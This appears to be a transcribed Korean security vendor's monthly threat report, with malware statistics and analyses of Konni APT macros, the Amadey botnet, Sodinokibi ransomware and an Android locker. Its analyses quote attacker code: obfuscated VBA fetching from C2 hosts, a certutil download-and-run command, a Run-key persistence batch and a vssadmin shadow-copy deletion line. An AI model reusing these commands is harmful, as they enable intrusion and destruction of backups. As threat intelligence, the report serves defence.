01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

Size: px
Start display at page:

Download "01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No"

Transcription

1 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

2 01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 신종랜섬웨어 'Sodinokibi', 입사지원서사칭해유포중! 03 악성코드분석보고 개요 악성코드상세분석 결론 04 글로벌보안동향 53-67

3 이스트시큐리티보안동향보고서 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 1

4 01 악성코드통계및분석 1. 악성코드동향 2019 년 4 월에는 GandCrab 를기존에주로유포하던 VenusLocker 유포조직외에새로운조직으로보이는단체가기존 VenusLocker 조직의유포방식과유사하게 GandCrab 을뿌리는정황이확인되었고, 그외에도 GandCrab 랜섬웨어와여러가지연관성을지닌 Sodinokibi 랜섬웨어가등장하였습니다. 기업환경에서는 2,3 월과마찬가지로이번달도역시 CLOP 랜섬웨어유포조직이진행하는기업타깃대량공격이확인되었습니다. 4 월에발생한 GandCrab 랜섬웨어이슈를보면, 기존의이메일첨부파일을활용한사회공학적기법공격과거의동일한방식으로유포가이뤄졌으며, 중소기업을사칭한견적요청, 입사지원서위장, 이미지사용중지요청, 경찰청, 국세청, 헌법재판소등으로사칭한소환장 등그내용이기존부터많이활용되던키워드를여전히사용하면서본문내용만살짝바꾸는방식을주로활용했습니다. 특히 4 월에는기존 GandCrab 랜섬웨어를주로유포하던 VenusLocker 유포조직 외에도 ESRC 에서리플라이오퍼레이터 (Reply Operator) 라고명명한또다른공격조직의활동이포착되었고이들역시여러차례에걸쳐 GandCrab 랜섬웨어를유포하는상황이확인되었습니다. GandCrab 뿐만아니라기업대상윈도서버를공격하는클롭 (Clop) 랜섬웨어도 2 월말부터시작하여 3 월그리고 4 월까지가그피해가꾸준히계속되는상황입니다. 클롭랜섬웨어의경우이전에송장이나인보이스사칭으로악성메일을뿌렸고악성문서첨부파일을통해매크로활성화를유도하여감염을진행하고있으며 ESRC 에서는이클롭랜섬웨어공격을주도하는조직이 TA505 공격그룹에의한소행으로추정하고있습니다. 랜섬웨어이슈외에도다양한 APT 공격시도도확인되었고, 특히 4 월에는해외에서커다란 2 가지정보유출사고가있었습니다. 첫번째로, Docker Hub 데이터베이스가해킹당해 19 만명의사용자정보가유출되는커다란사고가발생했습니다. 노출된사용자정보에는일부사용자이름과해쉬처리된암호, GitHub 와 Bitbucket 저장소에대한토큰도포함되어있었기때문에토큰에저장된사용권한에따라서는특정저장소로접근이가능한문제였고 Docker Hub 이미지가서버구성과어플리케이션에활용되는특징때문에심각한공급망공격 (Supply-Chain-Attacks) 으로이어질가능성이있는대규모유출사고였습니다. 두번째로는, 특히해외에서특정업계사람들의구인 / 구직과동종업계인력정보를파악할수있는 SNS 서비스인 Linkedin 의사용자기록 6천만건이온라인에노출된사실이알려져큰이슈가되었습니다. 특히링크드인의경우단순이메일이나개인정보뿐만아니라, 프로필, 직업기록, 교육기록, 위치, 기술목록, 다른소셜프로필정보, 최근프로필업데이트시간등다양한민감정보를제공했기에더욱커다란이슈가되었습니다. 벌써 1 년중 1/3 이지났습니다. 지금까지외부위협으로부터안전하셨나요? 지금한번더사용중인 OS 와 SW 의 최신보안패치의점검과자료백업진행도권고드립니다. 2

5 01 악성코드통계및분석 2. 알약악성코드탐지통계 감염악성코드 TOP15 감염악성코드 Top 15 는사용자 PC 에서탐지된악성코드를기반으로산출한통계다 년 4 월의감염악성코드 Top 15 리스트에서는지난 2019 년 3 월에 1,2,3 위를차지했던 Trojan.Agent.gen, Misc.HackTool.AutoKMS, Trojan.HTML.Ramnit.A 이이번달 Top 15 리스트에서도역시 1,2,3 위를차지했다. 전반적으로악성코드진단수치자체는지난 3 월과대비하여 5% 가량소폭감소한추세를보였다. 순위 등락 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 - Trojan.Agent.gen Trojan 1,167, Misc.HackTool.AutoKMS Trojan 825, Trojan.HTML.Ramnit.A Trojan 713, Hosts.media.opencandy.com Host 554, Misc.HackTool.KMSActivator Trojan 382, Misc.Keygen Trojan 290, Trojan.ShadowBrokers.A Trojan 277, Gen:Trojan.Downloader.NGX@ae4UWZeO Trojan 277, Win32.Ramnit.Dam Virus 237, Misc.Riskware.TunMirror Trojan 211, Win32.Neshta.A Virus 205, Gen:Variant.Razy Trojan 186, New Trojan.PSW.Seikooc Trojan 180, Trojan.LNK.Gen Trojan 165, New Worm.ACAD.Bursted.doc.B Worm 159,856 * 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 2019 년 04 월 01 일 ~ 2019 년 04 월 31 일 3

6 01 악성코드통계및분석 악성코드유형별비율 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 80% 를차지했으며호스트 (Host) 파일변조유형이 9% 로그뒤를이었다. 웜 (Worm) 3% 호스트파일 (Host) 바이러스 9% (Virus) 8% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 트로이목마 (Trojan) 80% 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 카테고리별악성코드비율전월비교 4 월에는 3 월과비교하여트로이목마 (Trojan) 악성코드감염카테고리비율이소폭증가했으며, 바이러스 (Virus) 유형이 지난달과비슷한추세를보였다. 또한호스트파일 (Host) 유형은소폭감소했다. 트로이목마 (Trojan) 80% 75% 스파이웨어 (Spyware) 0% 0% 애드웨어 (Adware) 0% 3% 하이재커 (Hijacker) 0% 0% 웜 (Worm) 3% 0% 취약점 (Exploit) 0% 3% 바이러스 (Virus) 8% 8% 백도어 (Backdoor) 0% 0% 호스트파일 (Host) 9% 11% 기타 (Etc) 0% 0% 0% 20% 40% 60% 80% 100% 4 월 3 월 4

7 악성코드통계및분석 3. 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 4 월랜섬웨어차단통계 해당통계는통합백신알약공개용버전의 랜섬웨어차단 기능을통해수집한월간통계로써, DB 에의한시그니쳐 탐지횟수는통계에포함되지않는다. 4 월 1 일부터 4 월 30 일까지총 95,422 건의랜섬웨어공격시도가차단되었습니다. 2 월에비해공격건수는 13% 가량감소하였다. 4 월랜섬웨어차단통계 4,500 4,000 3,500 3,000 2,500 2,000 1,500 1, 악성코드유포지 / 경유지 URL 통계 해당통계는 Threat Inside 에서수집한악성코드유포지 / 경유지 URL 에대한월간통계로, 4 월한달간총 9,887 건의악성코드경유지 / 유포지 URL 이확인되었다. 이수치는 3 월한달간확인되었던 14,233 건의악성코드유포지 / 경유지건수에비해약 30% 가량감소한수치다 악성 URL 경유지 / 유포지통계 0 경유지 유포지 URL 수 5

8 이스트시큐리티보안동향보고서 02 전문가보안기고 1. 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 2. 신종랜섬웨어 'Sodinokibi', 입사지원서사칭해유포중! 6

9 02 전문가보안기고 1. 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 지난 01 월 02 일 암호화폐내용의 Konni APT 캠페인과 ' 오퍼레이션헌터아도니스 ' 보고서를공개한바있는데, 최근이들의사이버위협활동이또다시감지되고있습니다. File Name MD5 C2 요청주신정책관련자료.doc (BlueSky) 0eb c74327cd4d47819f filer1.1apps[.]com File Name MD5 C2 젠트리온지갑관련자료.doc (BlueSky) 2bfbf8ce47585aa86b1ab90ff109fd57 filer2.1apps[.]com 한국어를구사하는대표적인 APT 위협그룹중에하나인 'Konni' 조직은아직도베일에싸여있습니다. 최근변종이연속적으로발견되고있는데, 헌터아도니스에서공개된바있는 'BlueSky' 계정이동일하게사용되고있는 점이주목됩니다. ESRC 는하나의계정에서지속적인 APT 공격정황이포착됨에따라이번사이버작전을 ' 오퍼레이션블루 스카이 (Operation Blue Sky)' 로명명했습니다. 이번위협은악성워드 (DOC) 문서로부터시작되며, 이들은주로스피어피싱을통한공격벡터를활용합니다. 7

10 02 전문가보안기고 04 월달에돌아온 Konni' 2019 년 04 월 29 일에제작된악성문서파일은실행시다음과같이보안경고메시지와함께매크로실행을 유도하게만듭니다. [ 그림 1] 매크로실행을유도하기위한안내메시지화면 여기서흥미로운점은본문화면이 'TA505 조직, 또다시엑셀문서로위장한악성이메일유포해 ' 분석자료에서도 유사하게사용된바있습니다. 두위협조직이직간접적으로연관된것인지, 인터넷에공개된자료가사용되어우연하게오버랩된것인지아직 확실하지않습니다. 8

11 02 전문가보안기고 AppWord.Quit False End Sub Sub Document_Open() Dim URL As String Dim Location As String Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Set objwinhttp = CreateObject("WinHttp.WinHttpRequest.5.1") URL = " objwinhttp.open "GET", URL, False objwinhttp.send "" 공격자는마치한국의유명포털사이트도메인처럼사칭한 C2 서버에서또다른문서파일을다운로드해실행하는 명령을수행합니다. ESRC 는해당서버를조사하는과정에서디렉토리리스팅설정문제로내부에등록된다른파일을확인할수 있었습니다. 9

12 02 전문가보안기고 [ 그림 2] C2 서버에등록된다른파일목록 여기에는총 12 개항목의 DOC 문서가포함되어있으며, 대부분공격에사용하기위한목적으로제작되었습니다. 각각의화면은대부분암호화폐관련내용이나금융관련문구를포함하고있으며, 동일하게 'BlueSky' 계정에서 제작되었습니다. 10

13 02 전문가보안기고 [ 그림 3] DOC 문서실행된화면모음 해당파일들은동일한목적으로제작되었기때문에대표파일하나만기준으로설명하면다음과같습니다. 우선매크로기능을통해 2 차 C2 서버 'alabamaok0515.1apps[.]com' 주소로통신을시도합니다. End If scl = scl & Chr(&H65) scl = scl & Chr(&H78) scl = scl & Chr(&H65) scl = scl & Chr(&H20) scl = scl & Chr(&H2F) scl = scl & Chr(&H71) 11

14 02 전문가보안기고 scl = scl & Chr(&H20) scl = scl & Chr(&H2F) scl = scl & Chr(&H63) scl = scl & Chr(&H20) Dim smo As String smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat" scl = scl + smo nresult = Shell(sCL, vbhide) ActiveDocument.Save End Sub '1.txt' 파일은다음과같이 '3.txt' 파일을로드하게됩니다. [ 그림 4] '1.txt' 배치파일명령화면 12

15 02 전문가보안기고 '1.txt' 배치파일은 '3.txt' BASE64 코드를디코딩해 'setup.cab' 파일로생성하고다시압축을해제한후 'install.bat' 파일을실행하는과정을거칩니다. '3.txt' 파일은다음과같이 BASE64 코드를가지고있습니다. [ 그림 5] '3.txt' 파일코드화면 마지막으로변환되는 'setup.cab' 압축파일내부에는 'install.bat', 'picture.exe' 파일이포함되어있으며, ' ' C2 서버의명령을대기하게됩니다 'picture.exe' 파일내부에는다음과같은 PDB 정보가포함되어있습니다. - c:\users\admin\documents\xicon\vs2005\release\xicontest.pdb 13

16 02 전문가보안기고 05 월달에돌아온 Konni ESRC 는 05 월 13 일제작된유사한변종을추가로확인할수있었고, 04 월과마찬가지로 'BlueSky' 계정과공격 벡터는거의같은흐름을가지고있으며, 악성 DOC 는코드페이지 949 인한국어기반으로제작되었습니다. 다만, 이번공격에서는매크로코드내부의 C2 URL 주소를단순한방식으로난독화해숨겨두었고, 이기법은이전 아도니스작전이랑거의유사합니다. AppWord.Quit False End Sub Sub Document_Open() Dim URL As String Dim Location As String Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Set objwinhttp = CreateObject("WinHttp.WinHttpRequest.5.1") Dim surl As String surl = Chr(&H68) & Chr(&H74) & Chr(&H74) & Chr(&H70) & Chr(&H3A) & Chr(&H2F) & Chr(&H2F) & Chr(&H66) & Chr(&H69) & Chr(&H67) & Chr(&H68) & Chr(&H69) & Chr(&H74) & Chr(&H69) & Chr(&H6E) & Chr(&H67) & Chr(&H31) & Chr(&H30) & Chr(&H31) & Chr(&H33) & Chr(&H2E) & Chr(&H6F) & Chr(&H72) & Chr(&H67) & Chr(&H2F) & Chr(&H32) & Chr(&H2F) URL = surl + "modif8.doc" objwinhttp.open "GET", URL, False objwinhttp.send "" surl 문자로선언된 16 진수코드를변환하면다음과같은사이트로접속을하여 'modif8.doc' 파일을다운로드해 실행하게됩니다 번째스테이지로작동하는 DOC 파일역시한국어기반으로제작되었으며, 문서작성자역시 'BlueSky' 계정으로 동일합니다. 이악성파일이실행되면다음과같이암호화폐관련내용으로이용자를현혹하게됩니다. 14

17 02 전문가보안기고 [ 그림 6] 악성문서가실행될경우보여지는화면 매크로코드를살펴보면다음과같이선언되어있고, 16 진수코드를 ASCII 코드로변환하면새로운 C2 주소가 확인됩니다. End If sfirst = sfirst & Chr(&H65) sfirst = sfirst & Chr(&H78) sfirst = sfirst & Chr(&H65) 15

18 02 전문가보안기고 sfirst = sfirst & Chr(&H20) sfirst = sfirst & Chr(&H2F) sfirst = sfirst & Chr(&H71) sfirst = sfirst & Chr(&H20) sfirst = sfirst & Chr(&H2F) sfirst = sfirst & Chr(&H63) sfirst = sfirst & Chr(&H20) Dim smo As String Dim smid As String smid = Chr(&H68) & Chr(&H74) & Chr(&H74) & Chr(&H70) & Chr(&H3A) & Chr(&H2F) & Chr(&H2F) & Chr(&H74) & Chr(&H67) & Chr(&H62) & Chr(&H61) & Chr(&H62) & Chr(&H63) & Chr(&H72) & Chr(&H66) & Chr(&H76) & Chr(&H2E) & Chr(&H31) & Chr(&H61) & Chr(&H70) & Chr(&H70) & Chr(&H73) & Chr(&H2E) & Chr(&H63) & Chr(&H6F) & Chr(&H6D) & Chr(&H2F) smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f " + smid + "1.txt && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat" sfirst = sfirst + smo nfinal = Shell(sfirst, vbhide) ActiveDocument.Save End Sub C2 주소는기존 Konni 조직이사용하는 '1apps[.]com' 호스팅서비스가이번에도그대로사용됩니다. - 도메인은랜덤한영문알파벳이사용되었으며, 매크로함수에의해 '1.txt' 파일을다운로드해배치파일형태로실행하며, 'certutil.exe' 정상파일을 'ct.exe' 파일로복사해사용합니다. 이러한방식은 EDR 같은제품들이악성여부를판단하는데회피하는요소로활용될수있습니다. '1.txt' 파일은다음과같은명령어가조합되어있고, 기존이랑큰차이가없습니다. 16

19 02 전문가보안기고 [ 그림 7] '1.txt' 파일화면 배치파일명령이작동할경우 '3.txt' 파일의코드를가져오는데이전과마찬가지로 BASE64 코드로인코딩된데이터를 가지고있으며, 'ct.exe'(=certutil.exe) 파일을통해압축을해제하는과정을거칩니다. 17

20 02 전문가보안기고 [ 그림 8] '3.txt' 코드화면 BASE64 코드블럭이디코딩되면기존과동일하게 'setup.cab' 파일로변환되고, 압축내부에존재하는 'install.bat' 파일이실행됩니다. 압축내부에는 'install.bat' 파일과함께 'victory.exe' 파일이포함되어있고, 아래와같은배치파일명령에의해 실행됩니다. 18

21 02 off copy /y %~dp0\victory.exe C:\Users\Public\Documents > nul reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchost /t REG_SZ /d "C:\Users\Public\Documents\victory.exe" /f > nul C:\Users\Public\Documents\victory.exe > nul %~dp0\remove.bat > nul 'victory.exe' 악성파일이실행되면 C2 서버로접속해또다른악성코드를다운로드하여실행을시도합니다. - 그리고다음과같이러시아봇넷으로알려져있는 AMADEY 패널로접속을시도합니다. - AMADEY 봇넷코드는이미깃허브등에공개되어있어여러사이버위협에지속적으로악용되고있는실정입니다. 19

22 02 전문가보안기고 [ 그림 9] AMADEY 서버메인화면 AMADEY 서버의 'index.php' 파일에는 'config.php' 코드에설정된아이디와암호를통해접근하게됩니다. 20

23 02 전문가보안기고 <? include( "cfg/config.php" ); session_start(); error_reporting( 0 ); if ( isset( $_POST["login"]) && isset( $_POST["password"] )) { $login = $_POST["login"]; $password = $_POST["password"]; if ( ( $login == $conf["login"] ) && ( md5( $password ) == $conf["password"] ) ) { $_SESSION["Name"] = "ROOT"; "Refresh: 0; url = statistic.php" ); if ( ( $login == $conf["observer_login"] ) && ( md5( $password ) == $conf["observer_password"] ) ) { $_SESSION["Name"] = "OBSERVER"; "Refresh: 0; url = statistic.php" ); } if ( $_GET['logout'] == 1 ) { header( "Location: login.php" ); exit; 21

24 02 전문가보안기고 봇넷과세션이연결되면, 공격자가설정한악의적인명령이수행되며, 감염된컴퓨터의정보가유출될수있습니다. [ 그림 10] AMADEY 컨트롤센터 (CC) 화면 Konni 조직은오퍼레이션블루스카이를통해 AMADEY 봇넷을활용하고있다는점에주목되며, ESRC 는이들조직이 사용한공격도구와전술에대한지속적인연구를수행하고있습니다. 'Konni' 캠페인과관련한보다상세한침해지표 (IoC) 내용은 ' 쓰렛인사이드 (Threat Inside)' 의위협인텔리전스리포트를 통해자세한내용이공개되어있으며, 지속적으로정보를제공할예정입니다. 22

25 02 전문가보안기고 2. 신종랜섬웨어 'Sodinokibi', 입사지원서 사칭해유포중! 2019 년 05 월 15 일오전 ' 입사지원합니다 ' 라는입사지원서를사칭한피싱메일이유포되고있어채용담당자분들의 주의가필요합니다. 이번에포착된피싱메일은어제발견된견적요청메일에서제목과내용만약간수정되었을뿐, 전반적으로비슷한 형태를띠고있습니다. [ 그림 1] 입사지원서를사칭한피싱메일화면 23

26 02 전문가보안기고 해당메일에는 '(OOO) 이력서.alz' 라는 '( 지원자명 ) 이력서 ' 형태의제목을가진압축파일 (alz) 이첨부되어 있습니다.( 지원자명의경우피싱메일에따라상이할수있습니다.) 채용담당자가해당메일을입사지원서관련파일로착각하여압축해제하면, 다음과같이 PDF 문서 (.pdf) 를위장한 악성실행파일이들어있습니다. [ 그림 2] PDF 문서파일을위장한악성파일 악성실행파일은 '(OOO) 이력서.pdf( 긴공백 ).exe' 이라는이중확장자형태이며, 굉장히많은공백을삽입해악성 실행파일임을속이려고시도했습니다. 따라서채용담당자가해당파일을 PDF 파일로착각해실행한다면, 다음과같이 Sodinokibi 랜섬웨어에감염됩니다. Sodinokibi 랜섬웨어는감염된 PC 의바탕화면을파란색화면으로변경하고, 랜섬노트에 Hello, dear friend 라는 문구로시작한다는특징이있습니다. 24

27 02 전문가보안기고 [ 그림 3] Sodinokibi 랜섬웨어에감염된 PC 화면 이번에발견된 Sodinokibi 랜섬웨어샘플은각폴더에 '0umzxro1-readme.txt' 라는랜섬노트와 'e21290ac.lock' 라는 파일이생성되며, 0umzxro1 확장자로모든파일이암호화됩니다. [ 그림 4] 암호화된파일화면 25

28 02 전문가보안기고 [ 그림 5] Sodinokibi 랜섬노트화면 랜섬노트에는안내된링크를 TOR 브라우저를통해방문하라는메시지가적혀있으며, TOR 브라우저를통해해당링크 주소로들어가면다음과같은사이트를확인할수있습니다. 26

29 02 전문가보안기고 [ 그림 6] Sodinokibi 랜섬노트에기재된사이트화면 Sodinokibi 랜섬웨어는최근발견된신종랜섬웨어로이전의갠드크랩처럼국내에대량으로유포되고있습니다. 각기업의채용담당자께서는출처가불분명한사용자에게서온 ' 입사지원서 ' 이메일에포함된첨부파일다운로드를 지양해주시기바라며, 파일을실행하기전에는백신프로그램을이용하여악성여부를확인해주시기바랍니다. 알약에서는해당악성샘플에대하여 'Trojan.Ransom.Sodinokibi' 으로탐지중에있습니다. 27

30 이스트시큐리티보안동향보고서 03 악성코드분석보고 개요 악성코드상세분석 결론 28

31 03 악성코드분석보고 [Trojan.Ransom.Sodinokibi] 악성코드분석보고서 1. 개요 최근신종 Sodinokibi 랜섬웨어가발견되었다. 이번에발견된악성코드는난독화된자바스크립트가 Powershell 을실행하고디코딩을한후최종적으로정상프로세스에랜섬웨어파일을주입하여실행하는형태이다. 또한로컬시스템만감염시키는것이아니라로컬과연결된네트워크드라이브에대해서도암호화를시도하고, C&C 서버에사용자정보를전송한다. 지속적인변종이등장할가능성이높은만큼사용자의주의가필요하다. 따라서, 본보고서에서는 Sodinokibi 랜섬웨어를상세분석하고자한다. 29

32 03 악성코드분석보고 2. 악성코드상세분석 1. 랜섬웨어드로퍼이악성코드는여러중간과정을통해최종랜섬웨어 PE 파일을드롭한다. 이과정은자바스크립트실행, 파워쉘스크립트실행, 난독화 PE 실행순으로진행된다. 난독화된자바스크립트코드는아래와같이문자를리스트화하여인덱스를이용한산술계산을진행한다. 복호화된코드는파워쉘스크립트를실행한다. 이때생성된파워쉘스크립트또한난독화되어있다. [ 그림 1] 자바스크립트코드일부 [ 그림 2] 난독화된파워쉘스크립트코드 30

33 03 악성코드분석보고 base64 로인코딩되어있어있는파워쉘스크립트를디코딩하면.NET 으로빌드한 PE 파일이나파일형태로저장하여 실행하지않고 [Reflection.Assembly]::Load 를이용하여파일을읽어현재스크립트에서 Install1 을실행한다. [ 그림 3] 디코딩된파워쉘스크립트 Install1 에는 base64 로인코딩된 PE 파일이존재하며이를디코딩하고실행한다. [ 그림 4] 인코딩된 PE 파일 해당파일은델파이로빌드되었으며, HELP 리소스에존재하는 0x7b 로 xor 인코딩된 PE 파일을숨기고있다. 31

34 03 악성코드분석보고 [ 그림 5] HELP 리소스에존재하는인코딩된 PE 파일 디코딩된파일은특정백신의존재를확인하고 20 분간지연했다가, autoup.exe 라는이름의정상프로세스에악성 파일을주입하여실행한다. [ 그림 6] 프로세스인젝션코드 32

35 03 악성코드분석보고 2.1. 중복실행방지 중복실행을방지하기위해뮤텍스를사용한다. 뮤텍스의이름은 Global\3555A3D6-37B F7BE- F3AAB5B6644A 이고, 만약뮤텍스가중복되어있으면프로세스를종료한다. [ 그림 7] 중복실행방지코드 2.2. 프로세스종료 현재실행중인프로세스이름을검색하여 mysql.exe 프로세스가실행중일경우해당프로세스를종료한다 [ 그림 8] 특정프로세스종료코드 2.3 시스템복원기능무력화 vssadmin.exe 프로세스명령어를통해시스템복원파일인볼륨섀도우복사본을삭제한다. 이를통해감염된 시스템의복원기능이무력화된다. 실행코드는다음과같다. "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures [ 표 1] 볼륨섀도우삭제코드 2.4 사용자정보전송 33

36 03 악성코드분석보고 감염 PC 로부터 OS 정보, ComputerName, 그룹정보, 언어정보, 암호화에사용된키정보등을탈취및레지스트리에 저장한다. 해당정보들은 HKEY_LOCAL_MACHINE\SOFTWARE\recfg 로저장되어이후 C&C 서버로전송된다. [ 그림 9] 감염 PC 정보 이때사용되는도메인은총 1079 개로이중임의로접속을시도한다. 접속 URL 은다음의경로중임의로택하는특정 규칙을가진다. 하위경로 1 하위경로 2 "wp-content"; "images" "static"; "pictures" "content"; "image" "include"; "temp" "uploads"; "tmp" "news"; "graphic" "data"; "assets" "admin"; "pics" "game" [ 표 2] URL 경로리스트 선택된경로하위로 jpg, png, gif 파일로데이터를전송한다. [ 그림 10] 사용자정보전송코드 2.5. 랜섬웨어기능해당랜섬웨어는사용자의시스템언어를확인하여암호화여부를결정한다. 다음과같은언어를사용중일경우에는암호화를진행하지않으며, 이외의언어를사용하는시스템에대해서만암호화를진행한다. 34

37 03 악성코드분석보고 [ 그림 11] 사용자시스템언어확인 LANG_ROMANIAN, LANG_AZERBAIJANI, LANG_RUSSIAN, LANG_BELARUSIAN, LANG_UKRAINIAN, LANG_ESTONIAN, LANG_LATVIAN, LANG_TAJIK, LANG_FARSI, LANG_ARMENIAN, LANG_AZERI, LANG_GEORGIAN, LANG_KAZAK, LANG_KYRGYZ, LANG_TURKMEN, LANG_UZBEK, LANG_TATAR [ 표 3] 확인하는시스템언어목록 암호화대상파일을검색하고암호화를진행한다. 다음과같은문자열이포함되어있는경우암호화에서제외된다. 이는시스템운영에필요한폴더및파일을암호화하지않음으로써정상적인악성행위를유지하기위함으로보인다. 다음은암호화제외폴더와파일목록이다. 암호화제외폴더목록 암호화제외파일목록 program files (x86), msocache,program files, boot, intel, $windows.~bt, perflogs, windows, $windows.~ws, system volume information,$recycle.bin, tor browser,mozilla,appdata,programdata,windows.old,google,application data, bootsect.bak, bootfont.bin, ntldr, ntuser.ini, ntuser.dat,desktop.ini,ntuser.dat.log,autorun.inf,boot.ini,iconcache.db,thumbs.db [ 표 4] 암호화제외목록 35

38 03 악성코드분석보고 다음은암호화대상파일을검색하는코드이다. [ 그림 12] 암호화대상파일검색코드 해당랜섬웨어는아래와같은확장자를제외한파일에대해서만암호화를진행한다. msi, spl, ics, icns, themepack, deskthemepack, ps1, 386, diagcab, ani, scr, theme, bin, icl, key, mpa, hlp, com,ico, adv, hta, shs, drv, rtp, msc, msu, sys, ldf, bat, prf, wpx, nls, rom, mod, dll, lnk, diagpkg, diagcfg, lock, ocx, idx, cpl, exe, cur, cab, msp, nomedia, cmd, msstyles [ 표 5] 암호화제외확장자 암호화가완료되면아래와같이 [ 원본파일이름 ].[ 기존확장자명 ]. 뒤에 [ 영문숫자랜덤 ] 이추가된다. 36

39 03 악성코드분석보고 [ 그림 13] 암호화완료화면 파일암호화가모두끝나면, 랜섬웨어감염사실과파일복호화방법을알리는랜섬노트를생성한다. 랜섬웨어는 사용자바탕화면경로에확장자로사용한 [ 영문숫자랜덤 ]-readme.txt 형식으로생성한다. 내용은감염된파일을 복구하기위해 TOR 브라우저로접속할것을안내하고있다. 또한감염된 PC 의바탕화면을파란색화면으로변경한다. [ 그림 14] 랜섬노트화면 37

40 03 악성코드분석보고 [ 그림 15] 감염된시스템의바탕화면 38

41 03 악성코드분석보고 3. 결론 해당랜섬웨어는로컬시스템만감염시키는것이아니라로컬과연결된네트워크드라이브에대해서도암호화를시도 한다. 연결된시스템이백업을위한폴더나서버일경우더큰피해로이어질수있다. 사용자들은랜섬웨어를예방하기위해중요파일은주기적으로백업하는습관을들여야한다. 또한패치누락으로인한 취약점이발생하지않도록운영체제와소프트웨어는최신버전을유지하는것이중요하다. 현재알약에서는 Trojan.Ransom.Sodinokibi 로진단하고있다. 39

42 03 악성코드분석보고 [Trojan.Android.Locker] 악성코드분석보고서 1. 개요 최근 PC 악성코드의대부분은랜섬웨어이며복호화대가로암호화폐를요구하고있다. 이러한흐름이안드로이드에서도빈번하게나타나기시작했다. 관련앱은기기정보를탈취하여감염자를구별하는데사용한다. 외부저장소의폴더와파일을가리지않고저장된모든파일을암호화한다. 또한, 연락처도암호화한다. 이때암호화에사용되는알고리즘은 AES 이며키값은해커의 C&C 를통해서얻어온다. 암호화폐를이용하여비용을지불하면복호화가진행된다. 본분석보고서에서는 Trojan.Android.Locker 를상세분석하고자한다. 40

43 03 악성코드분석보고 2. 악성코드상세분석 2.1 게임앱위장 해당악성앱의아이콘은전세계적으로인기를끈게임으로위장하고있으며사용자가설치한이후에는자동으로 자신의아이콘을감춘후바로암호화관련액티비티가실행된다. [ 그림 1] 아이콘숨김 2.2 필요권한암호화에필요한행위를위해서정의된권한들이며각각을살펴보면 INTERNET 은 C&C 와의통신, RECEIVE_BOOT_COMPLETED 는지속적인악성행위를위해서기기가부팅되면앱자동실행, SET_WALLPAPER 랜섬웨어감염을나타내기위한기기바탕화면변경, READ_EXTERNAL_STORAGE 와 WRITE_EXTERNAL_STORAGE 는대상파일들을읽고쓴후암호화하는데각각필요한권한이다. [ 그림 2] 필요권한 41

44 03 악성코드분석보고 2.3 바탕화면변경 감염된사실을나타내기위해서기기의바탕화면을변경한다. 해당언어는러시아어이며 당신의폰은 잠겼습니다 라는의미이며러시아를대상으로하는악성앱임을알수있다. [ 그림 3] 랜섬노트이미지파일 42

45 03 악성코드분석보고 [ 그림 4] 앱내부에저장된랜섬웨어감염화면 2.4 기기정보탈취기기정보에서디바이스, 브랜드, 하드웨어, 아이디, 모델을탈취하여 md5 암호화한후고유식별번호로쓰고추가로릴리즈, 인코딩된모델과통신사국가코드를이용하여 C&C 의추가경로로사용한다. 이후외부저장소와관련된권한이있을경우암호화를진행한다. 이때, 암호화키값은 C&C 를통해서얻는다. 43

46 03 악성코드분석보고 [ 그림 5] C&C 연결및파일암호화진행 2.5 파일암호화진행 저장소에저장된폴더와파일을가리지않고모두암호화한다. 대상파일의경로를확인하고 encrypted 문구가 없으면파일을읽어드리고 AES 암호화를진행한다. 원본파일은삭제한다. 44

47 03 악성코드분석보고 [ 그림 6] 파일암호화 2.6 연락처암호화진행 파일암호화가끝나면이어서연락처암호화를진행한다. 파일암호화와달리 AES 암호화이후에나오는문자열을 Base64 인코딩을추가로진행한다. 원본연락처는삭제한다. 45

48 03 악성코드분석보고 [ 그림 7] 연락처암호화 2.7 기기상태저장 현재기기가어떤상태인지저장한다. 앱의 sharedpreferences 에상태를저장한다. 암호화가완료되면 worked 가 1 이된다. 46

49 03 악성코드분석보고 [ 그림 8] 기기상태저장 2.8 기기조작제어 뒤로가기, 앱종료, 홈버튼조작과멀티화면등악성앱의랜섬노트화면이화면에서사라지는작용이생기면바로 다시나타나도록하여기기의터치와조작을통한사용을완전히차단한다. 47

50 03 악성코드분석보고 [ 그림 9] 기기사용차단 2.9 복호화요청복호화요청탭을누르면이전에수집했던탈취한기기정보로조합한고유번호를확인하여복호화비용지불여부를확인한다. 암호화폐지불이완료됐다면복호화가진행된다. 이후에복호화완료상태인 finished 문자열을기록한다. 만약해당부분이비어있다면, 현재실행중인앱프로세스를확인하고랜섬웨어행위와관련된액티비티를새롭게시작한다.( 현재 C&C 와의통신이되지않아서복호화비용지불과정에서어떠한화면이추가로나타나는지알수없다.) 48

51 03 악성코드분석보고 49

